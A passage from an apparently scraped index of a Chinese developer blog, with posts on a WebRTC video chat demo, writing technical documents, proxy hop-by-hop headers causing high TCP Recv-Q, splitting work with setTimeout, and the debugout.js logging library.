127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.","title":"一行命令搭建简易静态文件http服务器"},{"content":" 本例子是参考webrtc-tutorial-simple-video-chat做的。 这个教程应该主要是去宣传ScaleDrone的sdk, 他们的服务是收费的,但是免费的也可以用,就是有些次数限制。\n本栗子的地址 本栗子的pages地址\n因为使用的是ScaleDrone的js sdk, 后期很可能服务不稳定之类的\n1. 准备 使用最新版谷歌浏览器(62版) 视频聊天中 一个是windows, 一个是mac stun服务器使用谷歌的,trun使用ScaleDrone的sdk,这样我就不用管服务端了。 2. 先上效果图 3. 再上在线例子点击此处 4. 源码分析 // 产生随机数 if (!location.hash) { location.hash = Math.floor(Math.random() * 0xFFFFFF).toString(16); } // 获取房间号 var roomHash = location.hash.substring(1); // 放置你自己的频道id, 这是我注册了ScaleDrone 官网后,创建的channel // 你也可以自己创建 var drone = new ScaleDrone(\u0026#39;87fYv4ncOoa0Cjne\u0026#39;); // 房间名必须以 \u0026#39;observable-\u0026#39;开头 var roomName = \u0026#39;observable-\u0026#39; + roomHash; var configuration = { iceServers: [{ urls: \u0026#39;stun:stun.l.google.com:19302\u0026#39; // 使用谷歌的stun服务 }] }; var room; var pc; function onSuccess() {} function onError(error) { console.error(error); } drone.on(\u0026#39;open\u0026#39;, function(error){ if (error) { return console.error(error);} room = drone.subscribe(roomName); room.on(\u0026#39;open\u0026#39;, function(error){ if (error) {onError(error);} }); // 已经链接到房间后,就会收到一个 members 数组,代表房间里的成员 // 这时候信令服务已经就绪 room.on(\u0026#39;members\u0026#39;, function(members){ console.log(\u0026#39;MEMBERS\u0026#39;, members); // 如果你是第二个链接到房间的人,就会创建offer var isOfferer = members.length === 2; startWebRTC(isOfferer); }); }); // 通过Scaledrone发送信令消息 function sendMessage(message) { drone.publish({ room: roomName, message }); } function startWebRTC(isOfferer) { pc = new RTCPeerConnection(configuration); // 当本地ICE Agent需要通过信号服务器发送信息到其他端时 // 会触发icecandidate事件回调 pc.onicecandidate = function(event){ if (event.candidate) { sendMessage({ \u0026#39;candidate\u0026#39;: event.candidate }); } }; // 如果用户是第二个进入的人,就在negotiationneeded 事件后创建sdp if (isOfferer) { // onnegotiationneeded 
在要求session协商时发生 pc.onnegotiationneeded = function() { // 创建本地sdp描述 SDP (Session Description Protocol) session描述协议 pc.createOffer().then(localDescCreated).catch(onError); }; } // 当远程数据流到达时,将数据流装载到video中 pc.onaddstream = function(event){ remoteVideo.srcObject = event.stream; }; // 获取本地媒体流 navigator.mediaDevices.getUserMedia({ audio: true, video: true, }).then( function(stream) { // 将本地捕获的视频流装载到本地video中 localVideo.srcObject = stream; // 将本地流加入RTCPeerConnection 实例中 发送到其他端 pc.addStream(stream); }, onError); // 从Scaledrone监听信令数据 room.on(\u0026#39;data\u0026#39;, function(message, client){ // 消息是我自己发送的,则不处理 if (client.id === drone.clientId) { return; } if (message.sdp) { // 设置远程sdp, 在offer 或者 answer后 pc.setRemoteDescription(new RTCSessionDescription(message.sdp), function(){ // 当收到offer 后就接听 if (pc.remoteDescription.type === \u0026#39;offer\u0026#39;) { pc.createAnswer().then(localDescCreated).catch(onError); } }, onError); } else if (message.candidate) { // 增加新的 ICE candidate 到本地的链接中 pc.addIceCandidate( new RTCIceCandidate(message.candidate), onSuccess, onError ); } }); } function localDescCreated(desc) { pc.setLocalDescription(desc, function(){ sendMessage({ \u0026#39;sdp\u0026#39;: pc.localDescription }); },onError); } 5. WebRTC简介 5.1. 介绍 WebRTC 是一个开源项目,用于Web浏览器之间进行实时音频视频通讯,数据传递。 WebRTC有几个JavaScript APIS。 点击链接去查看demo。\ngetUserMedia(): 捕获音频视频 MediaRecorder: 记录音频视频 RTCPeerConnection: 在用户之间传递音频流和视频流 RTCDataChannel: 在用户之间传递文件流 5.2. 在哪里使用WebRTC? Chrome FireFox Opera Android iOS 5.3. 什么是信令 WebRTC使用RTCPeerConnection在浏览器之间传递流数据, 但是也需要一种机制去协调收发控制信息,这就是信令。信令的方法和协议并不是在WebRTC中明文规定的。 在codelab中用的是Node,也有许多其他的方法。\n5.4. 什么是STUN和TURN和ICE? 
STUN(Session Traversal Utilities for NAT,NAT会话穿越应用程序)是一种网络协议,它允许位于NAT(或多重NAT)后的客户端找出自己的公网地址,查出自己位于哪种类型的NAT之后以及NAT为某一个本地端口所绑定的Internet端端口。这些信息被用来在两个同时处于NAT路由器之后的主机之间创建UDP通信。该协议由RFC 5389定义。 wikipedia STUN\nTURN(全名Traversal Using Relay NAT, NAT中继穿透),是一种资料传输协议(data-transfer protocol)。允许在TCP或UDP的连线上跨越NAT或防火墙。 TURN是一个client-server协议。TURN的NAT穿透方法与STUN类似,都是通过取得应用层中的公有地址达到NAT穿透。但实现TURN client的终端必须在通讯开始前与TURN server进行交互,并要求TURN server产生\u0026quot;relay port\u0026quot;,也就是relayed-transport-address。这时TURN server会建立peer,即远端端点(remote endpoints),开始进行中继(relay)的动作,TURN client利用relay port将资料传送至peer,再由peer转传到另一方的TURN client。wikipedia TURN\nICE (Interactive Connectivity Establishment,互动式连接建立 ),一种综合性的NAT穿越的技术。 互动式连接建立是由IETF的MMUSIC工作组开发出来的一种framework,可整合各种NAT穿透技术,如STUN、TURN(Traversal Using Relay NAT,中继NAT实现的穿透)、RSIP(Realm Specific IP,特定域IP)等。该framework可以让SIP的客户端利用各种NAT穿透方式打穿远程的防火墙。[wikipedia ICE]\nWebRTC被设计用于点对点之间工作,因此用户可以通过最直接的途径连接。然而,WebRTC的构建是为了应付现实中的网络: 客户端应用程序需要穿越NAT网关和防火墙,并且对等网络需要在直接连接失败的情况下进行回调。 作为这个过程的一部分,WebRTC api使用STUN服务器来获取计算机的IP地址,并将服务器作为中继服务器运行,以防止对等通信失败。(现实世界中的WebRTC更详细地解释了这一点。)\n5.5. WebRTC是否安全? WebRTC组件是强制要求加密的,并且它的JavaScript APIS只能在安全的域下使用(HTTPS 或者 localhost)。信令机制并没有被WebRTC标准定义,所以是否使用安全的协议就取决于你自己了。\n6. WebRTC 参考资料 官网教程\nWebRTC 简单的视频聊天 repo\nWebRTC 教程\nMDN WebRTC API\n谷歌codelab WebRT教程\ngithub上WebRTC各种例子\nsegemntfault上关于WebRTC的教程\n","permalink":"https://wdd.js.org/posts/2018/02/webrtc-tutorial-simple-video-chat/","summary":"本例子是参考webrtc-tutorial-simple-video-chat做的。 这个教程应该主要是去宣传ScaleDrone的sdk, 他们的服务是收费的,但是免费的也可以用,就是有些次数限制。\n本栗子的地址 本栗子的pages地址\n因为使用的是ScaleDrone的js sdk, 后期很可能服务不稳定之类的\n1. 准备 使用最新版谷歌浏览器(62版) 视频聊天中 一个是windows, 一个是mac stun服务器使用谷歌的,trun使用ScaleDrone的sdk,这样我就不用管服务端了。 2. 先上效果图 3. 再上在线例子点击此处 4. 
源码分析 // 产生随机数 if (!location.hash) { location.hash = Math.floor(Math.random() * 0xFFFFFF).toString(16); } // 获取房间号 var roomHash = location.hash.substring(1); // 放置你自己的频道id, 这是我注册了ScaleDrone 官网后,创建的channel // 你也可以自己创建 var drone = new ScaleDrone(\u0026#39;87fYv4ncOoa0Cjne\u0026#39;); // 房间名必须以 \u0026#39;observable-\u0026#39;开头 var roomName = \u0026#39;observable-\u0026#39; + roomHash; var configuration = { iceServers: [{ urls: \u0026#39;stun:stun.l.google.com:19302\u0026#39; // 使用谷歌的stun服务 }] }; var room; var pc; function onSuccess() {} function onError(error) { console.","title":"120行代码实现 浏览器WebRTC视频聊天"},{"content":" 本文来自于公司内部的一个分享。 在文档方面,对内的一些接口文档主要是用swagger来写的。虽然可以在线测试,比较方便。但是也存在着一些更新不及时,swgger文档无法导出成文件的问题。 在对外提供的文档方面:我主要负责做一个浏览器端的一个js sdk。文档还算可以github地址,所以想把一些写文档的心得分享给大家。\n1. 衡量好文档的唯一标准是什么? Martin(Bob大叔)曾在《代码整洁之道》一书打趣地说:当你的代码在做 Code Review 时,审查者要是愤怒地吼道:\n“What the fuck is this shit?” “Dude, What the fuck!” 等言辞激烈的词语时,那说明你写的代码是 Bad Code,如果审查者只是漫不经心的吐出几个\n“What the fuck?”,\n那说明你写的是 Good Code。衡量代码质量的唯一标准就是每分钟骂出“WTF” 的频率。\n衡量文档的标准也是如此。\n2. 好文档的特点 简洁:一句话可以说完的事情,就不要分两句话来说。并不是文档越厚越好,太厚的文档大多没人看。 准确: 字段类型,默认值,备注,是否必填等属性说明。 逻辑性: 文档如何划分? 利于查看。 demo胜千言: 好的demo胜过各种字段说明,可以复制下来直接使用。 读者心: 从读者的角度考虑, 方法尽量简洁。可以传递一个参数搞定的事情,绝对不要让用户去传两个参数。 及时更新: 不更新的文档比bug更严重。 向后兼容: 不要随意废弃已有的接口或者某个字段,除非你考虑到这样做的后果。 建立文档词汇表:每个概念只有一个名字,不要随意起名字,名不正则言不顺。 格式统一:例如时间格式。我曾见过2017-09-12 09:32:23, 或2017.09.12 09:32:23或2017.09.12 09:32:23。变量名user_name, userName。 使用专业词语:不要过于口语化 3. 总结: 写出好文档要有以下四点 逻辑性:便于查找 专业性: 值得信赖,质量保证 责任心:及时更新,准确性,向后兼容 读者心:你了解的东西,别人可能并不清楚。从读者的角度去考虑,他们需要什么,而不是一味去强调你能提供什么。 4. 写文档的工具 markdown: 方便快捷,可以导出各种格式的文件 swagger: 功能强大,需要部署,不方便传递文件 5. markdown 工具推荐 蚂蚁笔记 这是我正使用的。 全平台(mac windows ios)有客户端,和浏览器端 笔记可以直接公布为博客 支持独立域名 标签很好用 支持思维导图 支持历史记录 cmd-markdown 有道云笔记 6. 
文档之外 公司有个同事,我曾问他使用什么搜索一些技术文档,他说用百度。作为一个翻墙老司机,我惊诧的问他:你为什么不用谷歌去搜索。他说他不会翻墙。我只能呵呵一笑。\n自从有一次搜索:graph for x^8 + y^8,我就决定不再使用百度了。你可以看一下两者的返回结果有什么不同。\n总之:有些鸟儿是关不住的 他们的羽毛太鲜亮了。\n","permalink":"https://wdd.js.org/posts/2018/02/how-to-write-a-technical-document/","summary":"本文来自于公司内部的一个分享。 在文档方面,对内的一些接口文档主要是用swagger来写的。虽然可以在线测试,比较方便。但是也存在着一些更新不及时,swagger文档无法导出成文件的问题。 在对外提供的文档方面:我主要负责做一个浏览器端的一个js sdk。文档还算可以github地址,所以想把一些写文档的心得分享给大家。\n1. 衡量好文档的唯一标准是什么? Martin(Bob大叔)曾在《代码整洁之道》一书打趣地说:当你的代码在做 Code Review 时,审查者要是愤怒地吼道:\n“What the fuck is this shit?” “Dude, What the fuck!” 等言辞激烈的词语时,那说明你写的代码是 Bad Code,如果审查者只是漫不经心的吐出几个\n“What the fuck?”,\n那说明你写的是 Good Code。衡量代码质量的唯一标准就是每分钟骂出“WTF” 的频率。\n衡量文档的标准也是如此。\n2. 好文档的特点 简洁:一句话可以说完的事情,就不要分两句话来说。并不是文档越厚越好,太厚的文档大多没人看。 准确: 字段类型,默认值,备注,是否必填等属性说明。 逻辑性: 文档如何划分? 利于查看。 demo胜千言: 好的demo胜过各种字段说明,可以复制下来直接使用。 读者心: 从读者的角度考虑, 方法尽量简洁。可以传递一个参数搞定的事情,绝对不要让用户去传两个参数。 及时更新: 不更新的文档比bug更严重。 向后兼容: 不要随意废弃已有的接口或者某个字段,除非你考虑到这样做的后果。 建立文档词汇表:每个概念只有一个名字,不要随意起名字,名不正则言不顺。 格式统一:例如时间格式。我曾见过2017-09-12 09:32:23, 或2017.09.12 09:32:23或2017.09.12 09:32:23。变量名user_name, userName。 使用专业词语:不要过于口语化 3. 总结: 写出好文档要有以下四点 逻辑性:便于查找 专业性: 值得信赖,质量保证 责任心:及时更新,准确性,向后兼容 读者心:你了解的东西,别人可能并不清楚。从读者的角度去考虑,他们需要什么,而不是一味去强调你能提供什么。 4. 写文档的工具 markdown: 方便快捷,可以导出各种格式的文件 swagger: 功能强大,需要部署,不方便传递文件 5.","title":"如何写好技术文档?"},{"content":"1. 问题现象 使用netstat -ntp命令时发现,Recv-Q 1692012 异常偏高(正常情况下,该值应该是0),导致应用占用过多的内存。\ntcp 1692012 0 172.17.72.4:48444 10.254.149.149:58080 ESTABLISHED 27/node 问题原因:代理的转发时,没有删除逐跳首部\n2. 什么是Hop-by-hop 逐跳首部? http首部可以分为两种\n端到端首部 End-to-end: 端到端首部代理在转发时必须携带的 逐跳首部 Hop-by-hop: 逐跳首部只对单次转发有效,代理在转发时,必须删除这些首部 逐跳首部有以下几个, 这些首部在代理进行转发前必须删除\nConnection Keep-Alive Proxy-Authenticate Proxy-Authorization Trailer TE Transfer-Encoding Upgrade 3. 什么是哑代理? 
很多老的或简单的代理都是盲中继(blind relay),它们只是将字节从一个连接转发到另一个连接中去,不对Connection首部进行特殊的处理。\n(1)在图4-15a中 Web客户端向代理发送了一条报文,其中包含了Connection:Keep-Alive首部,如果可能的话请求建立一条keep-alive连接。客户端等待响应,以确定对方是否认可它对keep-alive信道的请求。\n(2) 哑代理收到了这条HTTP请求,但它并不理解 Connection首部(只是将其作为一个扩展首部对待)。代理不知道keep-alive是什么意思,因此只是沿着转发链路将报文一字不漏地发送给服务器(图4-15b)。但Connection首部是个逐跳首部,只适用于单条传输链路,不应该沿着传输链路向下传输。接下来,就要发生一些很糟糕的事情了。\n(3) 在图4-15b中,经过中继的HTTP请求抵达了Web服务器。当Web服务器收到经过代理转发的Connection: Keep-Alive首部时,会误以为代理(对服务器来说,这个代理看起来就和所有其他客户端一样)希望进行keep-alive对话!对Web服务器来说这没什么问题——它同意进行keep-alive对话,并在图4-15c中回送了一个Connection: Keep-Alive响应首部。所以,此时Web服务器认为它在与代理进行keep-alive对话,会遵循keep-alive的规则。但代理却对keep-alive一无所知。不妙。\n(4) 在图4-15d中,哑代理将Web服务器的响应报文回送给客户端,并将来自Web服务器的Connection: Keep-Alive首部一起传送过去。客户端看到这个首部,就会认为代理同意进行keep-alive对话。所以,此时客户端和服务器都认为它们在进行keep-alive对话,但与它们进行对话的代理却对keep-alive一无所知。\n(5) 由于代理对keep-alive一无所知,所以会将收到的所有数据都回送给客户端,然后等待源端服务器关闭连接。但源端服务器会认为代理已经显式地请求它将连接保持在打开状态了,所以不会去关闭连接。这样,代理就会挂在那里等待连接的关闭。\n(6) 客户端在图4-15d中收到了回送的响应报文时,会立即转向下一条请求,在keep-alive连接上向代理发送另一条请求(参见图4-15e)。而代理并不认为同一条连接上会有其他请求到来,请求被忽略,浏览器就在这里转圈,不会有任何进展了。\n(7) 这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 \u0026ndash;《HTTP权威指南》\n这是HTTP权威指南中,关于HTTP哑代理的描述。这里说了哑代理会造成的一个问题。\n这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 实际上,我认为哑代理还是造成以下问题的原因\nTCP链接高Recv-Q tcp链接不断开,导致服务器内存过高,内存泄露 节点iowait高 在我们自己的代理的代码中,我有发现,在代理进行转发时,只删除了headers.host, 并没有删除headers.Connection等逐跳首部的字段\ndelete req.headers.host var option = { url: url, headers: req.headers } var proxy = request(option) req.pipe(proxy) proxy.pipe(res) 4. 解决方案 解决方案有两个, 我推荐使用第二个方案,具体方法参考Express 代理中间件的写法\n更改自己的原有代码 使用成熟的开源产品 5. 参考文献 What is the reason for a high Recv-Q of a TCP connection? TCP buffers keep filling up (Recv-Q full): named unresponsive linux探秘:netstat中Recv-Q 深究 深入剖析 Socket——TCP 通信中由于底层队列填满而造成的死锁问题 netstat Recv-Q和Send-Q 深入剖析 Socket——数据传输的底层实现 Use of Recv-Q and Send-Q 【美】David Gourley / Brian Totty HTTP权威指南 【日】上野宣 于均良 图解HTTP ","permalink":"https://wdd.js.org/posts/2018/02/tcp-high-recv-q-or-send-q-reasons/","summary":"1. 
问题现象 使用netstat -ntp命令时发现,Recv-Q 1692012 异常偏高(正常情况下,该值应该是0),导致应用占用过多的内存。\ntcp 1692012 0 172.17.72.4:48444 10.254.149.149:58080 ESTABLISHED 27/node 问题原因:代理的转发时,没有删除逐跳首部\n2. 什么是Hop-by-hop 逐跳首部? http首部可以分为两种\n端到端首部 End-to-end: 端到端首部代理在转发时必须携带的 逐跳首部 Hop-by-hop: 逐跳首部只对单次转发有效,代理在转发时,必须删除这些首部 逐跳首部有以下几个, 这些首部在代理进行转发前必须删除\nConnection Keep-Alive Proxy-Authenticate Proxy-Authorization Trailer TE Transfer-Encoding Upgrade 3. 什么是哑代理? 很多老的或简单的代理都是盲中继(blind relay),它们只是将字节从一个连接转发到另一个连接中去,不对Connection首部进行特殊的处理。\n(1)在图4-15a中 Web客户端向代理发送了一条报文,其中包含了Connection:Keep-Alive首部,如果可能的话请求建立一条keep-alive连接。客户端等待响应,以确定对方是否认可它对keep-alive信道的请求。\n(2) 哑代理收到了这条HTTP请求,但它并不理解 Connection首部(只是将其作为一个扩展首部对待)。代理不知道keep-alive是什么意思,因此只是沿着转发链路将报文一字不漏地发送给服务器(图4-15b)。但Connection首部是个逐跳首部,只适用于单条传输链路,不应该沿着传输链路向下传输。接下来,就要发生一些很糟糕的事情了。\n(3) 在图4-15b中,经过中继的HTTP请求抵达了Web服务器。当Web服务器收到经过代理转发的Connection: Keep-Alive首部时,会误以为代理(对服务器来说,这个代理看起来就和所有其他客户端一样)希望进行keep-alive对话!对Web服务器来说这没什么问题——它同意进行keep-alive对话,并在图4-15c中回送了一个Connection: Keep-Alive响应首部。所以,此时Web服务器认为它在与代理进行keep-alive对话,会遵循keep-alive的规则。但代理却对keep-alive一无所知。不妙。\n(4) 在图4-15d中,哑代理将Web服务器的响应报文回送给客户端,并将来自Web服务器的Connection: Keep-Alive首部一起传送过去。客户端看到这个首部,就会认为代理同意进行keep-alive对话。所以,此时客户端和服务器都认为它们在进行keep-alive对话,但与它们进行对话的代理却对keep-alive一无所知。\n(5) 由于代理对keep-alive一无所知,所以会将收到的所有数据都回送给客户端,然后等待源端服务器关闭连接。但源端服务器会认为代理已经显式地请求它将连接保持在打开状态了,所以不会去关闭连接。这样,代理就会挂在那里等待连接的关闭。\n(6) 客户端在图4-15d中收到了回送的响应报文时,会立即转向下一条请求,在keep-alive连接上向代理发送另一条请求(参见图4-15e)。而代理并不认为同一条连接上会有其他请求到来,请求被忽略,浏览器就在这里转圈,不会有任何进展了。\n(7) 这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 \u0026ndash;《HTTP权威指南》\n这是HTTP权威指南中,关于HTTP哑代理的描述。这里说了哑代理会造成的一个问题。\n这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 实际上,我认为哑代理还是造成以下问题的原因\nTCP链接高Recv-Q tcp链接不断开,导致服务器内存过高,内存泄露 节点iowait高 在我们自己的代理的代码中,我有发现,在代理进行转发时,只删除了headers.host, 并没有删除headers.Connection等逐跳首部的字段\ndelete req.headers.host var option = { url: url, headers: req.","title":"哑代理 - 
TCP链接高Recv-Q,内存泄露的罪魁祸首"},{"content":"对于执行时间过长的脚本,有的浏览器会弹出警告,说页面无响应。有的浏览器会直接终止脚本。总而言之,浏览器不希望某一个代码块长时间处于运行状态,因为js是单线程的。一个代码块长时间运行,将会导致其他任何任务都必须等待。从用户体验上来说,很有可能发生页面渲染卡顿或者点击事件无响应的状态。\n如果一段脚本的运行时间超过5秒,有些浏览器(比如Firefox和Opera)将弹出一个对话框警告用户该脚本“无法响应”。而其他浏览器,比如iPhone上的浏览器,将默认终止运行时间超过5秒钟的脚本。\u0026ndash;《JavaScript忍者秘籍》\nJavaScript忍者秘籍里有个很好的比喻:页面上发生的各种事情就好像一群人在讨论事情,如果有个人一直在说个不停,其他人肯定不乐意。我们希望有个裁判,定时的切换其他人来说话。\nJs利用定时器来分解任务,关键点有两个。\n按什么维度去分解任务\n任务的现场保存与现场恢复\n1. 例子 要求:动态创建一个表格,一共10000行,每行10个单元格\n1.1. 一次性创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.getElementsByTagName(\u0026#39;tbody\u0026#39;)[0]; var allLines = 10000; // 每次渲染的行数 console.time(\u0026#39;wd\u0026#39;); for(var i=0; i\u0026lt;allLines; i++){ var tr = document.createElement(\u0026#39;tr\u0026#39;); for(var j=0; j\u0026lt;10; j++){ var td = document.createElement(\u0026#39;td\u0026#39;); td.appendChild(document.createTextNode(i+\u0026#39;,\u0026#39;+j)); tr.appendChild(td); } tbody.appendChild(tr); } console.timeEnd(\u0026#39;wd\u0026#39;); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 总共耗时180ms, 浏览器已经给出警告![Violation] 'setTimeout' handler took 53ms。\n1.2. 
分批次动态创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.getElementsByTagName(\u0026#39;tbody\u0026#39;)[0]; var allLines = 10000; // 每次渲染的行数 var everyTimeCreateLines = 80; // 当前行 var currentLine = 0; setTimeout(function renderTable(){ console.time(\u0026#39;wd\u0026#39;); for(var i=currentLine; i\u0026lt;currentLine+everyTimeCreateLines \u0026amp;\u0026amp; i\u0026lt;allLines; i++){ var tr = document.createElement(\u0026#39;tr\u0026#39;); for(var j=0; j\u0026lt;10; j++){ var td = document.createElement(\u0026#39;td\u0026#39;); td.appendChild(document.createTextNode(i+\u0026#39;,\u0026#39;+j)); tr.appendChild(td); } tbody.appendChild(tr); } console.timeEnd(\u0026#39;wd\u0026#39;); currentLine = i; if(currentLine \u0026lt; allLines){ setTimeout(renderTable,0); } },0); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 这次异步按批次创建,没有耗时的警告。因为控制了每次代码在50ms内运行。实际上每80行耗时约10ms左右。这就不会引起页面卡顿等问题。\n","permalink":"https://wdd.js.org/posts/2018/02/settimeout-to-splice-big-work/","summary":"对于执行时间过长的脚本,有的浏览器会弹出警告,说页面无响应。有的浏览器会直接终止脚本。总而言之,浏览器不希望某一个代码块长时间处于运行状态,因为js是单线程的。一个代码块长时间运行,将会导致其他任何任务都必须等待。从用户体验上来说,很有可能发生页面渲染卡顿或者点击事件无响应的状态。\n如果一段脚本的运行时间超过5秒,有些浏览器(比如Firefox和Opera)将弹出一个对话框警告用户该脚本“无法响应”。而其他浏览器,比如iPhone上的浏览器,将默认终止运行时间超过5秒钟的脚本。\u0026ndash;《JavaScript忍者秘籍》\nJavaScript忍者秘籍里有个很好的比喻:页面上发生的各种事情就好像一群人在讨论事情,如果有个人一直在说个不停,其他人肯定不乐意。我们希望有个裁判,定时的切换其他人来说话。\nJs利用定时器来分解任务,关键点有两个。\n按什么维度去分解任务\n任务的现场保存与现场恢复\n1. 例子 要求:动态创建一个表格,一共10000行,每行10个单元格\n1.1. 
一次性创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.getElementsByTagName(\u0026#39;tbody\u0026#39;)[0]; var allLines = 10000; // 每次渲染的行数 console.time(\u0026#39;wd\u0026#39;); for(var i=0; i\u0026lt;allLines; i++){ var tr = document.createElement(\u0026#39;tr\u0026#39;); for(var j=0; j\u0026lt;10; j++){ var td = document.createElement(\u0026#39;td\u0026#39;); td.appendChild(document.createTextNode(i+\u0026#39;,\u0026#39;+j)); tr.appendChild(td); } tbody.appendChild(tr); } console.timeEnd(\u0026#39;wd\u0026#39;); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 总共耗时180ms, 浏览器已经给出警告![Violation] 'setTimeout' handler took 53ms。\n1.2. 分批次动态创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.","title":"定时器学习:利用定时器分解耗时任务案例"},{"content":" 我父亲以前跟我说过,有些事物在你得到之前是无足轻重的,得到之后就不可或缺了。微波炉是这样,智能手机是这样,互联网也是这样——老人们在没有互联网的时候过得也很充实。对我来说,函数的柯里化(curry)也是这样。\n然后我继续看了这本书的中文版。有些醍醐灌顶的感觉。 随之在github搜了一下。 我想,即使付费,我也愿意看。\n中文版地址:https://www.gitbook.com/book/llh911001/mostly-adequate-guide-chinese/details github原文地址:https://github.com/MostlyAdequate/mostly-adequate-guide\n1. 
后记 其实我是想学点函数柯里化的东西,然后用谷歌搜索了一下。第一个结果就是这本书。非常感谢谷歌搜索,如果我用百度,可能就没有缘分遇到这本书了。\n","permalink":"https://wdd.js.org/posts/2018/02/js-functional-programming/","summary":"我父亲以前跟我说过,有些事物在你得到之前是无足轻重的,得到之后就不可或缺了。微波炉是这样,智能手机是这样,互联网也是这样——老人们在没有互联网的时候过得也很充实。对我来说,函数的柯里化(curry)也是这样。\n然后我继续看了这本书的中文版。有些醍醐灌顶的感觉。 随之在github搜了一下。 我想,即使付费,我也愿意看。\n中文版地址:https://www.gitbook.com/book/llh911001/mostly-adequate-guide-chinese/details github原文地址:https://github.com/MostlyAdequate/mostly-adequate-guide\n1. 后记 其实我是想学点函数柯里化的东西,然后用谷歌搜索了一下。第一个结果就是这本书。非常感谢谷歌搜索,如果我用百度,可能就没有缘分遇到这本书了。","title":"关于JavaScript函数式编程,我多么希望能早点看到这本书"},{"content":" 本篇文章来自一个需求,前端websocket会收到各种消息,但是调试的时候,我希望把websocket推送过来的消息都保存到一个文件里,如果出问题的时候,我可以把这些消息的日志文件提交给后端开发去分析错误。但是在浏览器里,js一般是不能写文件的。鼠标另存为的方法也是不太好,因为会保存所有的console.log的输出。于是,终于找到这个debugout.js。\ndebugout.js的原理是将所有日志序列化后,保存到一个变量里。当然这个变量不会无限大,因为默认的最大日志限制是2500行,这个是可配置的。另外,debugout.js也支持在localStorage里存储日志的。\n1. debugout.js 一般来说,可以使用打开console面板,然后右键save,是可以将console.log输出的信息另存为log文件的。但是这就把所有的日志都包含进来了,如何只保存我想要的日志呢?\n(调试输出)从您的日志中生成可以搜索,时间戳,下载等的文本文件。 参见下面的一些例子。\nDebugout的log()接受任何类型的对象,包括函数。 Debugout不是一个猴子补丁,而是一个单独的记录类,你使用而不是控制台。\n调试的一些亮点:\n在运行时或任何时间获取整个日志或尾部 搜索并切片日志 更好地了解可选时间戳的使用模式 在一个地方切换实时日志记录(console.log) 可选地将输出存储在window.localStorage中,并在每个会话中持续添加到同一个日志 可选地,将日志上限为X个最新行以限制内存消耗 下图是使用downloadLog方法下载的日志文件。\n官方提供的demo示例,欢迎试玩。http://inorganik.github.io/debugout.js/\n2. 使用 在脚本顶部的全局命名空间中创建一个新的调试对象,并使用debugout的日志方法替换所有控制台日志方法:\nvar bugout = new debugout(); // instead of console.log(\u0026#39;some object or string\u0026#39;) bugout.log(\u0026#39;some object or string\u0026#39;); 3. API log() -像console.log(), 但是会自动存储 getLog() - 返回所有日志 tail(numLines) - 返回尾部指定行数的日志,默认100行 search(string) - 搜索日志 getSlice(start, numLines) - 日志切割 downloadLog() - 下载日志 clear() - 清空日志 determineType() - 一个更细粒度的typeof为您提供方便 4. 
可选配置 ··· // log in real time (forwards to console.log) self.realTimeLoggingOn = true; // insert a timestamp in front of each log self.useTimestamps = false; // store the output using window.localStorage() and continuously add to the same log each session self.useLocalStorage = false; // set to false after you\u0026rsquo;re done debugging to avoid the log eating up memory self.recordLogs = true; // to avoid the log eating up potentially endless memory self.autoTrim = true; // if autoTrim is true, this many most recent lines are saved self.maxLines = 2500; // how many lines tail() will retrieve self.tailNumLines = 100; // filename of log downloaded with downloadLog() self.logFilename = \u0026rsquo;log.txt\u0026rsquo;; // max recursion depth for logged objects self.maxDepth = 25; ···\n5. 项目地址 https://github.com/inorganik/debugout.js\n6. 另外 我自己也模仿debugout.js写了一个日志保存的项目,该项目可以在ie10及以上下载日志。 debugout.js在ie浏览器上下载日志的方式是有问题的。 